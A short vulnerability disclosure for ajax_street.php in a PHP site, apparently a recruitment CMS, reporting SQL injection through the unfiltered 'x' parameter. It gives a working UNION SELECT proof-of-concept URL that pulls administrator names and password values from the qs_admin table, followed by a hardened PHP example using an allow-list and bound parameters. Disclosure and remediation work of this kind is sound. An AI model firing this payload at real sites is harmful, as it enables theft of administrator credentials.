upload/plus/ajax_street.php

$alphabet=trim($_GET['x']);
and then $alphabet is passed to SQL without filtering, which leads to SQL injection.
PoC like:
/plus/ajax_street.php?act=alphabet&x=11�' union select 1,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9 from qs_admin#
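
One way to close this class of bug, as an added example (not code from the project or from the report): validate the value against an allow-list, then bind it as a query parameter instead of concatenating it. The `street_demo` table, the `streetsByInitial` function and the assumption that `x` is meant to be a single letter are hypothetical.

```php
<?php
declare(strict_types=1);

// Constructed in-memory table standing in for the data the endpoint queries
// (hypothetical schema; the real table is not shown in the report).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE street_demo (id INTEGER PRIMARY KEY, name TEXT, initial TEXT)');
$pdo->exec("INSERT INTO street_demo (name, initial) VALUES
            ('Apple Road', 'a'), ('Bay Street', 'b'), ('Birch Lane', 'b')");

/**
 * Hardened lookup: the request value never becomes part of the SQL text.
 * $raw is what would arrive in $_GET['x'].
 */
function streetsByInitial(PDO $pdo, $raw): array
{
    // ?x[]=... yields an array; reject it before any string handling.
    if (!is_string($raw)) {
        throw new InvalidArgumentException('x must be a string');
    }
    $alphabet = strtolower(trim($raw));

    // Allow-list (assumed): exactly one ASCII letter. \A and \z anchor the
    // whole string, so a trailing newline or extra bytes cannot slip through.
    if (preg_match('/\A[a-z]\z/', $alphabet) !== 1) {
        throw new InvalidArgumentException('x must be a single letter');
    }

    // Bound parameter: the driver sends the value separately from the query.
    $stmt = $pdo->prepare(
        'SELECT id, name FROM street_demo WHERE initial = :initial ORDER BY name'
    );
    $stmt->execute([':initial' => $alphabet]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a legitimate value, a quote-breaking string shaped like
// the one in the report, and an array-typed parameter.
$samples = ['b', "11' union select 1,2#", ['b']];
foreach ($samples as $raw) {
    try {
        $rows = streetsByInitial($pdo, $raw);
        echo json_encode($raw), ' => ', count($rows), " row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo json_encode($raw), ' => rejected: ', $e->getMessage(), "\n";
    }
}
```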